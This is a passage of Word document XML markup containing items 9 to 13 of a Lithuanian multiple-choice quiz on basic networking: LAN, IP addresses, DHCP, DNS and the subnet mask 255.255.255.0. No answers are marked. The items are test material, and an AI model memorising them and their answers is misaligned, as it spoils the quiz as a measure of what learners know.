        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20218CDA" w14:textId="77777777" w:rsidR="005D4796" w:rsidRPr="005A5C28" w:rsidRDefault="005D4796" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0720DA5F" w14:textId="4BAA307A" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>9. Kas yra LAN?</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12662A15" w14:textId="35E297D5" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">a) </w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ždarasis tinklas</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74692A9D" w14:textId="08644246"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b) </w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>iešasis tinklas</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0194B1B7" w14:textId="01747718"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c) </w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ietinis tinklas</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E23CB39" w14:textId="77777777" w:rsidR="005D4796" w:rsidRPr="005A5C28" w:rsidRDefault="005D4796" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40726384" w14:textId="7623FD2D" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">10. </w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Pabaikite teiginį:</w:t>
      </w:r>
      <w:r w:rsidR="001B491F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00FB2EDE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Kiekvienas kompiuteris ar įrenginys, dirbantis su TCP/IP protokolu tur</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>i...</w:t>
      </w:r>
      <w:r w:rsidR="00FB2EDE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">“ </w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pažymėkite teisingą</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6094F8" w14:textId="3D0CA61D" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>a) IP adresą</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373FE77A" w14:textId="294D8C84" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>b) TPP adresą</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A0170D" w14:textId="1F145F99" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>c) TCA adresą</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367CD44A" w14:textId="77777777" w:rsidR="005D4796" w:rsidRPr="005A5C28" w:rsidRDefault="005D4796" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DA11E7E" w14:textId="478DAE48" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>11.</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Pabaikite teiginį</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="001B491F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00FB2EDE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>DHCP – tai</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
      <w:r w:rsidR="00FB2EDE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pažymėkite teisingą</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291BC0A2" w14:textId="7984F539" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>a) spec. tinklo tarnybinė stotis, kur</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> statiškai priskiria IP adresą</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B9E03E" w14:textId="4CF054A1" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>b) spec. tinklo tarnybinė stotis, kur</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> dinamiškai priskiria IP adresą</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDC78BF" w14:textId="033CCA87" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>c) spec. tinklo tarnybinė stotis, kur</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> statiškai priskiria MAC adresą</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0D30E5" w14:textId="77777777" w:rsidR="005D4796" w:rsidRPr="005A5C28" w:rsidRDefault="005D4796" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E112982" w14:textId="3D13D441" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>12. Kas yra DNS?</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437205EA" w14:textId="2FD051D5"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a) </w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ai duomenų bazė, palaikanti hierarchinę sistemą</w:t>
      </w:r>
      <w:r w:rsidR="008774BF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0859C9DD" w14:textId="68698203"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b) </w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>nternete – simbolinio vardo priesaga</w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A1CD51" w14:textId="5F0C36BD"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c) </w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Tai </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>fizinis adresas</w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780205C1" w14:textId="77777777" w:rsidR="005D4796" w:rsidRPr="005A5C28" w:rsidRDefault="005D4796" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="154E98CF" w14:textId="11A7393F" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>13. Kas paprastai yra nurodoma adresu 255.255.255.0?</w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034904C3" w14:textId="4EEA5B77" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>a) IP adresas</w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23484BDD" w14:textId="0FC3CB7C" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>b) potinklio kaukė</w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27931868" w14:textId="6562130F" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>c) DNS</w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B9F429" w14:textId="77777777" w:rsidR="005D4796" w:rsidRPr="005A5C28" w:rsidRDefault="005D4796" w:rsidP="0089230F">
      <w:pPr>
